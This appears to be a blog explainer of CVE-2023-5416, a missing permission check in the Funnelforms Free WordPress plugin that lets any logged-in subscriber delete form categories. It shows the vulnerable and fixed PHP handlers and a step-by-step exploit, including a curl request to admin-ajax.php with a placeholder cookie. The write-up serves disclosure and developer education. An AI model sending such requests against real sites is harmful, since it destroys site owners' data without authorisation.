CVE-2023-5416 - How a Simple Missing Capability Check in Funnelforms Free Lets Any User Delete Your Categories
In the world of WordPress plugins, security mistakes can have massive consequences. In late 2023, a critical flaw was discovered in the popular Funnelforms Free plugin. Tracked as CVE-2023-5416, this vulnerability may not grant a full site compromise, but it still lets regular users cause serious headaches for site owners.
In this long read, I'll break down how this bug works, show you the vulnerable code, and walk through an example exploit — all in plain American English. You’ll understand why even "small" permission mistakes can lead to big trouble.
What is Funnelforms Free?
Funnelforms Free is a plugin that lets users build and manage forms in WordPress. It's popular for lead generation. At the time of discovery, it was used on over 10,000 active sites.
Who Can Exploit: Any *authenticated* WordPress user (including the lowest "subscriber" role)
- What Can Happen: Any user can delete existing Funnelforms categories, impacting forms and site structure.
> Reference:
> Wordfence Advisory
>
> NVD Entry
Why Does This Happen? Missing Capability Checks
WordPress plugins should always check a user's *capabilities* (permissions) before letting them make changes. If not, anyone logged in — even with the most basic role — could do things they shouldn't.
For Funnelforms Free, fnsf_delete_category forgot to add this check.
The Vulnerable Code
Let's look at the code (simplified, based on the plugin source). The weak spot is the missing current_user_can() check.
// Funnelforms Free vulnerable code (up to v3.4)
add_action('wp_ajax_fnsf_delete_category', 'fnsf_delete_category');
function fnsf_delete_category() {
// No check who is calling this!
$category_id = intval($_POST['category_id']);
// ... delete the category ...
wp_delete_term($category_id, 'funnelforms_category');
// Respond
wp_send_json_success();
}
What it should have done:
(Check if user has privileges, e.g. manage_options or a custom capability.)
function fnsf_delete_category() {
if (!current_user_can('manage_options')) {
wp_send_json_error('You are not allowed to do this');
return;
}
$category_id = intval($_POST['category_id']);
wp_delete_term($category_id, 'funnelforms_category');
wp_send_json_success();
}
Exploiting the Flaw: Step-by-Step
Attackers need just a subscriber-level account. For many WordPress sites, it’s trivial to get one (open registration, for example).
Register or Login as a subscriber (or higher) user.
2. Send a crafted AJAX request to the vulnerable action (wp-admin/admin-ajax.php?action=fnsf_delete_category).
Example Exploit Code (via Curl)
curl -X POST \
-b "wordpress_logged_in_someuser=CookieGoesHere" \
-d "action=fnsf_delete_category&category_id=3" \
https://victim-website.com/wp-admin/admin-ajax.php
> Replace CookieGoesHere with the attacker’s valid session cookie, and category_id with the target category’s ID.
Attack Success:
Any regular user can delete any Funnelforms category, breaking forms throughout the site.
Cause data loss you didn’t expect
This could disrupt businesses or campaigns relying on Funnelforms.
Lessons for Plugin Developers
- ALWAYS Check Capabilities: Before writing or deleting data, ask if the user should be able to do this.
More References
- Wordfence Vulnerability Database: CVE-2023-5416
- Official Funnelforms Plugin Page
- WordPress Roles and Capabilities
Conclusion
CVE-2023-5416 shows how even "simple" mistakes like missing a permission check can let regular users do a lot of damage. If you run a WordPress site with Funnelforms Free, double-check your plugin version—*and update now*. For developers, this is a reminder: *always* check what your logged-in users are allowed to do.
Timeline
Published on: 11/22/2023 16:15:00 UTC
Last modified on: 11/27/2023 20:16:00 UTC